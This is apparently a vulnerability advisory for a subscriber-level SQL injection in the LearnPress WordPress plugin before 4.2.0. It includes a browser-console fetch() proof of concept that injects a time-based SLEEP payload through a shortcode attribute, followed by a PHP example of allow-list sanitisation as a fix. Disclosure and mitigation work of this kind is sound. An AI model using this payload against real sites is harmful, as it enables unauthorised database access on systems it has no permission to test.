wpexploit | Wpvulndb | WPEX-ID:58BE94E8-5C21-41B5-BF1D-9B8D9DFDA9A0
Jan 24, 2023 - 12:00 a.m.

LearnPress Plugin < 4.2.0 - Subscriber+ SQLi

learnpress plugin
sql injection
subscriber
web exploitation

EPSS: 0.001 (Low), percentile 34.5%

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statements, which could allow any authenticated user, such as a subscriber, to perform SQL injection attacks. Note: The original advisory mentioned that the issue is only exploitable by contributors, but we confirmed that any authenticated user, such as a subscriber, can exploit it.

Run the command below in the browser's developer console while logged in to the blog as a subscriber user:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)' limit='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
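
A server-side mitigation for the attribute handling described above, as an added example (not LearnPress code and not its actual patch): the `order` and `limit` shortcode attributes are reduced to an allow-listed keyword and a bounded integer before they reach the query text. The function names, the `courses` table and its columns, the defaults and the cap of 100 are assumptions made for illustration.

```php
<?php
// Added illustration. Function names, table/column names, defaults and the
// cap of 100 are assumptions, not taken from the plugin.

/** Reduce untrusted shortcode attributes to values that are safe to place in SQL. */
function normalize_course_atts(array $atts): array
{
    $atts = array_merge(['order' => 'DESC', 'limit' => '10'], $atts);

    // ORDER BY direction is a keyword, not a value: it cannot be bound as a
    // query parameter, so accept exactly two spellings and fall back otherwise.
    $order = strtoupper(trim((string) $atts['order']));
    if (!in_array($order, ['ASC', 'DESC'], true)) {
        $order = 'DESC';
    }

    // LIMIT must be a plain integer within a fixed range; anything else
    // (non-numeric text, negative or oversized numbers) gets the default.
    $limit = filter_var($atts['limit'], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($limit === false) {
        $limit = 10;
    }

    return ['order' => $order, 'limit' => $limit];
}

/** Build the query text from normalized attributes only. */
function build_recent_courses_sql(array $atts): string
{
    $safe = normalize_course_atts($atts);
    return sprintf(
        'SELECT id, title FROM courses ORDER BY created_at %s LIMIT %d',
        $safe['order'],
        $safe['limit']
    );
}

// Constructed inputs: a normal shortcode, the attribute values from the
// request shown above, and an out-of-range limit.
$samples = [
    ['order' => 'asc', 'limit' => '5'],
    ['order' => " AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)", 'limit' => '1'],
    ['order' => 'DESC', 'limit' => '9999'],
];
foreach ($samples as $atts) {
    echo build_recent_courses_sql($atts), PHP_EOL;
}
```

Inside WordPress, attributes that are data rather than SQL keywords would additionally be bound with `$wpdb->prepare()`; the sort direction still needs an allow-list because a placeholder cannot stand in for a keyword.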
